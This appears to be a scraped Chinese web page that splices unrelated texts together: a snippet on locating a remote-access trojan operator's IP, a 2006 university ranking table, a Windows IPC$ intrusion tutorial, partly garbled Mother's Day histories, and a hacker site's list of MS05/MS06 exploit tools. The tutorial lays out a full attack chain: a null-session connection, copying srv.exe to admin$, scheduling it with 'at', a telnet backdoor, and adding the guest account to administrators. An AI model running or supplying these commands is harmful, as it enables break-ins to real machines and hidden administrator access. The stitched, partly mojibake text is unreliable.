28读取ip.txt 里的内容后确定鸽子的客户端ip!!!也是明文的。。很容易就看到了：
http://218.13.52.26/wwwroot/....

配置过鸽子的人都知道wwwroot是它的特征。。注意我用的鸽子是新版的。。所以跟旧版的鸽子设置文件略有不同如果是旧版应该是这样的http://218.13.52.26:5326/wwwroot/后面跟着的是端口

至此。。我们基本就掌握到了放鸽子的一些重要的资料了。。你可以直接扫描一下对方。。看有没漏洞。。也可以破解了它的ftp

2006中国大学100强

排名	校 名	总得分	人才培养			科学研究			分省排名		学校类型	学校参考类型
			得分	研究生 培养	本科生培养	得分	自然科学研究	社会科学研究
1	清华大学	267.6	113	82.94	29.93	155	135.1	18.1	京	1	理工	工学类	研究1型
2	北京大学	226.6	102	64.8	37.32	124	89.58	33.75	京	2	综合	综合类	研究1型
3	浙江大学	208	93	59.92	33.39	115	94.73	18.92	浙	1	综合	综合类	研究1型
4	上海交通大学	160	72	47.69	24.02	88.3	82.06	5.37	沪	1	综合	理科类	研究1型
5	复旦大学	138.9	65	38.83	25.92	74.1	51.86	21.55	沪	2	综合	综合类	研究1型
6	南京大学	125.8	59	34.93	24.16	66.7	46.21	19.9	苏	1	综合	综合类	研究1型
7	华中科技大学	114.1	54	31.68	22.37	60	52.26	7.2	鄂	1	理工	理科类	研究1型
8	武汉大学	109.7	52	30.33	21.17	58.2	39.42	18.2	鄂	2	综合	综合类	研究2型
9	吉林大学	98.93	49	25.99	22.55	50.4	41.06	8.86	吉	1	综合	综合类	研究2型
10	中山大学	96.45	41	28.56	12.29	55.6	43.76	11.32	粤	1	综合	综合类	研究1型
11	四川大学	93.58	42	26.8	14.92	51.9	40.19	11.19	川	1	综合	综合类	研究1型
12	西安交通大学	91.15	44	25.2	18.36	47.6	38.26	8.89	陕	1	综合	文理类	研究2型
13	中国科学技术大学	88.87	40	25.73	14.72	48.4	45.43	2.54	皖	1	理工	理科类	研究1型
14	哈尔滨工业大学	83.59	39	23.03	15.97	44.6	41.98	2.19	黑	1	理工	工学类	研究2型
15	山东大学	77.93	39	20.2	18.66	39.1	31.58	7.13	鲁	1	综合	综合类	研究1型
16	天津大学	72.56	33	20.83	12.17	39.6	36.05	3.14	津	1	理工	工学类	研究1型
17	南开大学	66.22	30	18.86	10.9	36.5	21.68	14.44	津	2	综合	综合类	研究1型
18	中南大学	63.14	31	17.12	13.98	32	29.73	2.01	湘	1	综合	理科类	研究2型
19	北京师范大学	61.95	28	17.74	10.14	34.1	15.04	18.71	京	3	师范	文理类	研究1型
20	中国协和医科大学	55.46	22	19.13	2.41	33.9	33.59	0.01	京	4	医药	医学类	研究1型
21	厦门大学	52.3	22	15.47	6.69	30.1	15.44	14.42	闽	1	综合	综合类	研究2型
22	东南大学	49.99	23	13.75	9.66	26.6	22.89	3.44	苏	2	综合	工学类	研究2型
23	北京航空航天大学	49.59	21	14.46	7.01	28.1	26.02	1.84	京	5	理工	工学类	研究2型
24	中国人民大学	47.97	22	13.75	7.76	26.5	0.42	25.79	京	6	综合	文科类	研究2型
25	华南理工大学	47.52	22	13.01	8.8	25.7	23.73	1.74	粤	2	理工	工学类	研究1型
26	同济大学	46.2	22	12.67	9.46	24.1	21.77	2.08	沪	3	理工	工学类	研究2型
27	大连理工大学	45.71	22	12.43	9.74	23.5	21.7	1.62	辽	1	理工	工学类	研究2型
28	西北工业大学	44.5	20	12.53	7.75	24.2	23.48	0.51	陕	2	理工	工学类	研究2型
29	重庆大学	39.13	22	8.55	13.81	16.8	14.83	1.78	渝	1	综合	工学类	研究2型
30	中国农业大学	38.23	17	10.75	6.35	21.1	19.47	1.46	京	7	农林	理科类	研究1型
31	东北大学	37.16	18	9.8	8.48	18.9	16.81	1.89	辽	2	理工	工学类	研究2型
32	华东师范大学	36.99	17	10.3	6.91	19.8	8.19	11.41	沪	4	师范	文理类	研究2型
33	兰州大学	36.5	18	9.12	8.9	18.5	15.41	2.9	甘	1	综合	理学类	研究2型
34	中国地质大学	33.55	17	8.63	8.18	16.7	15.96	0.62	鄂	3	理工	理科类	研究2型
35	北京理工大学	31.3	14	8.57	5.79	16.9	16.03	0.75	京	8	理工	工学类	研究2型
36	华东理工大学	30.95	14	8.58	5.25	17.1	16.54	0.41	沪	5	理工	工学类	研究1型
37	中国石油大学	30.09	15	7.64	7.16	15.3	15.09	0.35	京	9	理工	工学类	研教型
38	苏州大学	29.39	15	7.03	8	14.4	9.2	5.28	苏	3	综合	综合类	研教型
39	郑州大学	29.19	20	4.46	15.48	9.25	6.97	2.37	豫	1	综合	综合类	研教型
40	湖南大学	28.26	15	6.79	8.34	13.1	9.68	3.57	湘	2	综合	文理类	研教型
41	中国矿业大学	27.8	16	6.42	9.11	12.3	11.31	1.07	苏	4	理工	工学类	研教型
42	武汉理工大学	27.65	16	5.75	10.57	11.3	9.51	1.92	鄂	4	理工	文理类	研教型
43	北京科技大学	27.41	13	7.73	5.14	14.5	14.11	0.55	京	10	理工	工学类	研教型
44	南京航空航天大学	26.72	14	6.97	6.84	12.9	12.37	0.66	苏	5	理工	工学类	研教型
45	南京农业大学	26.36	13	6.43	6.25	13.7	11.8	2	苏	6	农林	理科类	研教型
46	西安电子科技大学	26.31	13	6.87	6.12	13.3	13.12	0.32	陕	3	理工	工学类	研教型
47	西北大学	26.3	13	6.37	6.43	13.5	9.9	3.72	陕	4	综合	综合类	研教型
48	暨南大学	26.26	11	7.27	3.86	15.1	7.6	7.68	粤	3	综合	综合类	研教型
49	电子科技大学	25.56	14	5.67	8.35	11.5	10.77	0.87	川	2	理工	工学类	研教型
50	南京理工大学	25.45	13	5.76	7.73	12	11.15	0.92	苏	7	理工	工学类	研教型
51	西南大学	25.42	15	4.7	10.67	10.1	6.68	3.46	渝	2	综合	综合类	研教型
52	西北农林科技大学	24.85	12	6.42	5.71	12.7	12.33	0.5	陕	5	农林	理科类	研教型
53	南京师范大学	24.72	13	5.99	6.93	11.8	4.87	7.04	苏	8	师范	文理类	研教型
54	上海大学	24.08	13	5.74	6.98	11.4	8.15	3.31	沪	6	综合	文理类	研教型
55	西南交通大学	21.91	12	5.08	6.91	9.92	8.36	1.65	川	3	理工	文理类	研教型
56	华中农业大学	21.28	11	4.98	6.36	9.95	8.86	1.18	鄂	5	农林	理科类	研教型
57	华中师范大学	21.05	11	5.19	5.82	10	3.48	6.64	鄂	6	师范	文理类	研教型
58	东北师范大学	20.98	11	5.12	5.67	10.2	6.82	3.46	吉	2	师范	文理类	研教型
59	中国海洋大学	20.83	9.3	5.9	3.36	11.6	10.54	1.13	鲁	2	综合	理科类	研教型
60	扬州大学	19.86	12	3.46	8.06	8.34	6.78	1.64	苏	9	综合	综合类	研教型
61	华南师范大学	18.5	9.5	4.39	5.11	9	3.79	5.3	粤	4	师范	文理类	研教型
62	华南农业大学	18.05	9.7	3.95	5.74	8.36	7.86	0.58	粤	5	农林	理科类	研教型
63	首都医科大学	17.69	6.8	5.91	0.91	10.9	10.87	0.08	京	11	医药	医学类	研教型
64	山西大学	17.55	9.1	3.96	5.13	8.46	5	3.54	晋	1	综合	综合类	研教型
65	湖南师范大学	17.55	9.8	3.65	6.19	7.72	3.81	3.98	湘	3	师范	文理类	研教型
66	北京化工大学	17.39	8.1	4.58	3.56	9.25	9.06	0.28	京	12	理工	工学类	研教型
67	中国医科大学	17.08	7.7	5.16	2.57	9.35	9.39	0.05	辽	3	医药	医学类	研教型
68	南昌大学	16.58	12	1.84	10.63	4.11	3.69	0.45	赣	1	综合	文理类	教研型
69	河海大学	16.53	9.7	3.5	6.25	6.79	6.03	0.82	苏	10	理工	工学类	研教型
70	北京交通大学	16.49	8.2	4.46	3.76	8.27	7.4	0.94	京	13	理工	工学类	研教型
71	陕西师范大学	16.49	8.2	4.16	4.03	8.3	4.43	3.94	陕	6	师范	综合类	研教型
72	云南大学	16.09	9.3	3.3	6.01	6.77	4.53	2.3	滇	1	综合	文理类	研教型
73	福建农林大学	15.51	7.9	3.05	4.81	7.65	7.44	0.28	闽	2	农林	农学类	研教型
74	北京工业大学	15.44	7.5	4.27	3.21	7.96	7.5	0.53	京	14	理工	工学类	研教型
75	南京工业大学	15.4	10	2.44	7.66	5.3	5.14	0.22	苏	11	理工	工学类	研教型
76	山东农业大学	15.34	8.9	3	5.94	6.4	5.85	0.61	鲁	3	农林	农学类	研教型
77	东华大学	15.24	8.8	3.25	5.53	6.46	6.13	0.39	沪	7	理工	工学类	研教型
78	哈尔滨工程大学	15.19	8.6	3.41	5.21	6.56	5.99	0.63	黑	2	理工	工学类	研教型
79	福州大学	15.1	8.8	3.03	5.72	6.35	5.45	0.96	闽	3	理工	工学类	研教型
80	中南财经政法大学	15.06	8.9	3.1	5.77	6.19	0.04	6.21	鄂	7	财经	文科类	研教型
81	河北大学	14.81	9.5	2.21	7.23	5.36	2.78	2.64	冀	1	综合	综合类	研教型
82	燕山大学	14.72	9.4	2.53	6.85	5.34	5.2	0.2	冀	2	理工	工学类	研教型
83	江苏大学	13.69	9.1	2.27	6.8	4.61	3.91	0.73	苏	12	综合	工学类	研教型
84	上海财经大学	13.65	6.6	3.56	3.07	7.03	0.08	7.02	沪	8	财经	文科类	研教型
85	北京邮电大学	13.61	7.2	3.22	3.95	6.43	6.22	0.27	京	15	理工	工学类	研教型
86	合肥工业大学	13.61	8.5	2.41	6.05	5.15	4.66	0.55	皖	2	理工	工学类	研教型
87	河南大学	13.41	8.7	1.81	6.87	4.72	2	2.75	豫	2	综合	文理类	研教型
88	贵州大学	12.86	11	0.86	9.64	2.36	2.05	0.33	黔	1	综合	理科类	教研型
89	太原理工大学	12.83	8	2.3	5.74	4.79	4.68	0.14	晋	2	理工	工学类	研教型
90	湘潭大学	12.63	8.5	1.94	6.54	4.15	2.81	1.37	湘	4	综合	综合类	研教型
91	浙江工业大学	12.54	7.9	1.91	6.03	4.6	4	0.63	浙	2	理工	工学类	研教型
92	青岛大学	12.51	8.6	1.53	7.03	3.96	3.07	0.92	鲁	4	综合	综合类	教研型
93	成都理工大学	12.46	8.6	1.68	6.88	3.91	3.75	0.19	川	4	理工	综合类	教研型
94	江南大学	12.4	8.2	1.93	6.25	4.23	3.83	0.43	苏	13	综合	工学类	研教型
95	昆明理工大学	12.38	7.9	2.17	5.76	4.45	4.16	0.32	滇	2	理工	工学类	研教型
96	中国药科大学	12.17	5	2.67	2.3	7.2	7.17	0.1	苏	14	医药	医学类	研教型
97	山东师范大学	12	7.6	1.99	5.6	4.41	2.67	1.77	鲁	5	师范	文理类	研教型
98	北京林业大学	11.95	6.8	2.62	4.14	5.19	5	0.25	京	16	林业	理科类	研教型
99	河北工业大学	11.94	7.7	1.81	5.9	4.22	4.1	0.15	冀	3	理工	工学类	研教型
100	华北电力大学	11.85	7.5	1.8	5.73	4.31	4.14	0.2	冀	4	理工	工学类	研教型

　

一网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 解惑: 1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。 也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2004年了,建议98的同志换一下系统吧,98不爽的) 2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接 3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立ipc$连接在hack攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的 因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接. 所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在. 四 ipc$与空连接,139,445端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). 2)ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享) 五 ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上操作系统; 2)对方没有打开ipc$默认共享 3)对方未开启139或445端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因： 错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限； 错误号51，Windows 无法找到网络路径 : 网络有问题； 错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$； 错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。 错误号1326，未知的用户名或错误密码 ： 原因很明显了； 错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况） 错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。 关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了. 六 如何打开目标的IPC$(此段引自相关文章) 首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。 七 如何防范ipc$入侵 1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等) 2禁止默认共享 1）察看本地共享资源 运行-cmd-输入net share 2）删除共享(每次输入一个） net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete（如果有e,f,……可以继续删除） 3）停止server服务 net stop server /y （重新启动后server服务会重新开启） 4）修改注册表 运行-regedit server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。 pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。 如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。 3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务 控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用 4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师 5设置复杂密码，防止通过ipc$穷举密码 八 相关命令 1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推) 如果已经和目标建立了ipc$，则可以直接用IP 盘符 $访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘，其他盘类推 net use * /del 删除全部,会有提示要求按y确认 九 经典入侵模式 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。 　　 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。 　　 3. C:\>net time \\127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。 　　 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！） 　　 5. C:\>net time \\127.0.0.1 再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。 　　 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 　　 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。 　　 8. C:\WINNT\system32>ntlm 输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！ 9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) 十 总结: 关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论. 最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,希望大家慎重`太子把这些做出来`呵呵`其实我也是在学`天亮了`累了 `大家开心

母亲节的由来

　　母亲节起源于希腊，古希腊人在这一天向希腊神话中的众神之母赫拉致敬。在17世纪中叶，母亲节流传到英国，英国人把封斋期的第四个星期天作为母亲节。在这一天里，出门在外的年青人将回到家中，给他们的母亲带上一些小礼物。

　　现代意义上的母亲节起源于美国，由AmanmJarvis（1864－1948）发起，她终身未婚，一直陪伴在她母亲身边。1905年在母亲去世时，Amanm悲痛欲绝。两年后（1907年），Amanm和她的朋友开始写信给有影响的部长、商人、议员来寻求支持，以便让母亲节成为一个法定的节日。Amanm认为子女经常忽视了对母亲的感情，她希望母亲节能够让人多想一想母亲为家庭所付出的一切。第一个母亲节于1908年5月10日在西弗吉尼亚州和宾夕法尼亚州举行，在这次节日里，康乃磬被选中为献给母亲的花，并以此流传下来。1913年，美国国会通过了一份议案，将每年5月的第二个星期天作为法定的母亲节。母亲节从此流传开来！

　　母亲节创立后，得到了全世界各国人民的支持。AmanmJarvis在世时，设立母亲节的国家已达43个。时至今日，欢庆这个节日的国家就更多了。母亲节，已经成了一个名副其实的国际性节日。按惯例，“国际母亲凇北欢ㄔ诿磕甑?月11日举行。虽然，有一些国家是在一年中不同的时节庆祝属于他们的母亲节，然而，包括我国在内的多数国家，如丹麦、芬兰、意大利、土耳其、澳大利亚和比利时等等，都是在5月的第二个星期日庆祝母亲节的。

英国母亲节的发展

　　十七世纪英格兰，为表达对英国母亲们的敬意，乃订四旬斋的第四个星期日为「Mothering Sunday」，人们在这一天回家探视双亲，并致礼表示敬意。（注：四旬斋是指复活节前夕之前，星期天除外的40天）。

　　当时，有许多的穷人必须在有钱人家里帮 讨生活，而被迫离家寄宿在主人家里，在Mothering Sunday这一天，主人们会放他们假，并鼓励他们返家与妈妈团聚。为增加欢乐气氛，也发展了一种特别的蛋糕称为－mothering cake。

　　随着基督神在欧洲的扩散，这个节日转为对「Mother Church」的崇敬：表达人们对赋予他们生命、保护他们免於伤害的精神力量的感谢。从此，教会的仪式便与母亲节的庆祝活动相结合，以同时传达人们对母亲与教会的感念。

美国母亲节的发展

　　在美国，最早关於母亲节的记载是1872年由茱丽雅（Julia Ward Howe即The Battle Hymn of the Republic的作者）所提出的，她建议将这一天献给「和平」，并在波斯顿等地举行母亲节的集会。

　　1907年，费城的安娜 (Ana Jarvis)为了发起订立全国性的母亲节而活动。她说服了她母亲所属的、位於西维琴尼亚州的教会，在她母亲逝世二周年的忌日～即五月的第二个星期天，举办母亲节庆祝活动。隔年，费城人也开始在同一天庆祝母亲节。

　　之後，安娜和支持者们开始写信给部长、企业家和政治家，要求订立全国性的母亲节，他们很成功的被接受了，因为1911年时，几乎所有的州都已开始庆祝母亲节了。威尔生总统 (President Woodrow Wilson)亦於1914年发表官方声言，让母亲节成为全国性的节日，就是每年五月的第二个礼拜天这一天。

全世界的母亲节

　　虽然，许多国家是在一年中不同的时节庆祝属於他们的母亲节。然而，多数国家如丹麦、芬兰、意大利、土耳其和比利时，都是在五月的第二个星期日庆祝母亲节的。

History of Mother′s Day




In the U.S. Mothers' Day is a holiday celebrated on second Sunday in May. It is a day when children honor their mothers with cards, gifts, and flowers. First observance in Philadelphia, Pa. in 1907, it is based on suggestions by Julia Ward Howe in 1872 and by Anna Jarvis in 1907.

Although it wasn't celebrated in the U.S. until 1907, there were days honoring mothers even in the days of ancient Greece. In those days, however, it was Rhea, the Mother of the gods that was given honor.

Later, in the 1600's, in England there was an annual observance called "Mothering Sunday." It was celebrated during June, on the fourth Sunday. On Mothering Sunday, the servants, who generally lived with their employers, were encouraged to return home and honor their mothers. It was traditional for them to bring a special cake along to celebrate the occasion.

In the U.S., in 1907 Ana Jarvis, from Philadelphia, began a campaign to establish a national Mother's Day. Jarvis persuaded her mother's church in Grafton, West Virginia to celebrate Mother's Day on the second anniversary of her mother's death, the 2nd Sunday of May. The next year Mother's Day was also celebrated in Philadelphia.

Jarvis and others began a letter-writing campaign to ministers, businessmen, and politicians in their quest to establish a national Mother's Day. They were successful. President Woodrow Wilson, in 1914, made the official announcement proclaiming Mother's Day a national observance that was to be held each year on the 2nd Sunday of May.

Many other countries of the world celebrate their own Mother's Day at different times throughout the year. Denmark, Finland, Italy, Turkey, Australia, and Belgium celebrate Mother's Day on the second Sunday in May, as in the U.S.




在美国,人们在五月的第二个星期天庆祝母亲节。在这一天，孩子们把卡片，礼物和鲜花献给他们的母亲。第一次庆祝母亲节是发生在1907 年的费城，是由朱莉娅·瓦德·豪和安妮塔·贾威斯分别在 1872 年和 1907 年提议设立的。

虽然美国直到 1907 年才庆祝母亲节，但是尊敬母亲的节日甚至可以追溯到古希腊。尽管那时人们是庆祝上帝的母亲罗伊的。

后来, 在17世纪初的英格兰，人们有一个惯例，就是在每年六月的第四个星期天庆祝“省亲节”。在省亲节那一天, 通常与雇主住在一起的仆人了, 被劝说回家和他们的母亲团聚。按照惯例，他们要带一块特殊的蛋糕回家庆祝。

在美国, 1907年有一个来自费城的叫阿纳·贾维斯的人，发起了一场建立全国的母亲节的运动。在西弗吉尼亚的格拉夫顿，贾维斯说服了她母亲的教堂，在她母亲去世2周年的纪念日那一天庆祝母亲节，即五月的第二个星期天。下一年费城也庆祝了母亲节。

贾维斯和其它人开始给部长，商人，以及政治家们写信，要求建立全国性的母亲节。他们取得了成功。1914年在任的伍德罗·威尔森总统，向全国发布官方通告，宣布在每年五月的第二个星期天庆祝母亲节，并使之成为一种传统。

世界上许多其它国家在全年的不同时间庆祝他们自己的母亲节。丹麦，芬兰，意大利，土耳其，澳大利亚，以及比利时同美国一样，在五月的第二个星期天庆祝母亲节。

安全中国专题: 微软---MS典型漏洞分析33个

软件--MS05012溢出工具(图)

软件--MS05018溢出工具(图)

软件--MS05037漏洞利用工具

软件--MS05039溢出工具(图)

软件--MS05-039溢出工具(三合一)

软件--MS420漏洞网页木马生成器

软件--MS05044溢出工具

软件--MS05045溢出工具(图)

软件--Ms05051溢出工具(图)

软件--MS05053溢出工具(图)

软件--MS05051Scan911漏洞扫描工具汉化版(图)

软件--MS05051Scan cn911群汉化版(图)

软件--MS05-051 Scan 1.0(图)

软件--MS0601(wmf图片)漏洞利用(图)

软件--MS0601(WMF)页木马生成器(图)

动画--MScan扫描器使用演示

动画--MS05039溢出动画

文章--MS05-032:Microsoft Agent 中的漏洞可能允许欺骗

文章--MS05-033:Telnet客户端中的漏洞可能导致信息泄露

文章--MS05-034:微软ISA Server 2000 的累积性安全更新

文章--MS05-035:Word中存在可能允许远程执行代码的漏洞

文章--MS05-036:颜色管理模块存在允许远程执行代码漏洞

文章--MS05-037:JView 事件探查器存在远程执行代码漏洞

文章--利用MS05-039漏洞传播的蠕虫公告!(MS05-038)

文章--Microsoft Windows RDP远程桌面协议拒绝服务漏洞(MS05-041)

文章--Internet Explorer CSS File Remote Buffer Overflow Exploit (MS04-038)

文章--Microsoft Windows MSDTC内存破坏漏洞(MS05-051)

文章--Internet Explorer COM对象实例化漏洞(MS05-052)

文章--从MS03-049漏洞利用看调试系统进程(图)

文章--经典漏洞MS04011的必杀技

文章--异步过程调用本地权限提升漏洞(MS05-055)

文章--MS05-055漏洞分析

文章--MS0601wmf文件远程执行代码利用程序无敌版(图)

新闻中心 漏洞公布    病毒公告 业界动态    黑客新闻 黑客人物 文章中心 入侵检测    漏洞研究 软件评测    操作系统 技巧知识    黑客编程 Q Q 技巧    安全防护 软件中心 扫描检测    远程监控 脚本注入    拒绝攻击 嗅探监听    木马后门 字典代理    密码破解 Q Q 软件    杀毒防护 安全书籍    升级补丁 动画中心 Q Q 动画    木马教程 脚本入侵    漏洞利用 加密破解    软件应用 安全配置    综合教程 编程中心 Delphi     VB编程 VC/C++     汇编编程 PB 编程    VFP 编程 ASP编程    PHP编程 JSP编程    CGI编程 .NET编程   Exploite 数据库编程 设计中心 PhotoShop     3D三维 Illustrator   Flash Fireworks  CorelDraw Freehand    Painter Dreamweaver 图像辅助

